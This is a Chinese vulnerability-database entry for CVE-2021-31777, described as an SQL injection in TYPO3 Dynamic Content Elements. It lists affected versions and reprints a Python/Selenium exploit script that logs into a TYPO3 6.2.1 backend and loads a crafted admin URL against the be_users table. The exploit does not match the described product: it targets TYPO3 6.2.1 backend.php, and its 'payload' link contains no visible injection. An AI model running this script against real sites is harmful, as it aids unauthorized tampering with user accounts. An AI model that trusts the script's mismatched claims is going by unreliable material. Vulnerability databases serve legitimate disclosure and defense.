TYPO3 Dynamic Content Element SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 2429219 漏洞类型 SQL注入
发布时间 2021-05-04 更新时间 2021-05-04
CVE编号 CVE-2021-31777 CNNVD-ID CNNVD-202104-1940
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2021050012
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202104-1940
|漏洞详情
TYPO3 Dynamic Content Element是瑞士TYPO3公司的一个手机应用软件。提供TCA映射功能,简单的后端视图。 Dynamic Content Elements 存在SQL注入漏洞,该漏洞源于对用户提供的数据的无害化处理不足。以下产品及版本受到影响:Dynamic Content Elements: 2.2.0, 2.2.1, 2.3.0, 2.3.1, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.7.0 。
|漏洞EXP
# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on backend.php
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty
# Date: 05.02.2021
# Vendor: https://typo3.org/
# Link: https://get.typo3.org/version/6.2.1
# CVE: CVE-2021-31777
# Proof: https://streamable.com/8v7v4i

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-31777

from selenium import webdriver
import time
import os, sys


# Vendor: https://typo3.org/
website_link="http://192.168.1.3/typo3_src-6.2.1/typo3/index.php"

# enter your login username
username="nu11secur1ty"

# enter your login password
password="password"

#enter the element for username input field
element_for_username="username"

#enter the element for password input field
element_for_password="p_field"

#enter the element for submit button
element_for_submit="commandLI"


#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users

time.sleep(3)
browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element  = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

# Exploit vulnerability MySQL user table by using backend.php vulnerability
time.sleep(3)
# Payload link
browser.get(("
http://192.168.1.3/typo3_src-6.2.1/typo3/alt_doc.php?edit[be_users][1]=edit&returnUrl=mod.php%3FM%3Dsystem_BeuserTxBeuser%26moduleToken%3D56862cd856952bfd539277eebf7b21c2a85ff950#"))


print("The payload is deployed it is time to destroy some user...\n")
os.system('pause')

browser.close()

except Exception:
#### This exception is if the user is not found in the database or
something is wrong.
print("Sorry, but this user who you searching for is destroyed by using of
MySQL vulnerability in backend.php...")

---------------------------------

# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on
backend.php
# Date: 05.02.2021
# Exploit Authotr idea: @nu11secur1ty
# Exploit Debugging: @nu11secur1ty
# Vendor Homepage: https://typo3.org/
# Software Link: https://get.typo3.org/version/6.2.1

# Steps to Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-31777

|参考资料

来源:vigilance.fr

链接:https://vigilance.fr/vulnerability/TYPO3-Dynamic-Content-Element-SQL-injection-35178


来源:www.cybersecurity-help.cz

链接:https://www.cybersecurity-help.cz/vdb/SB2021042709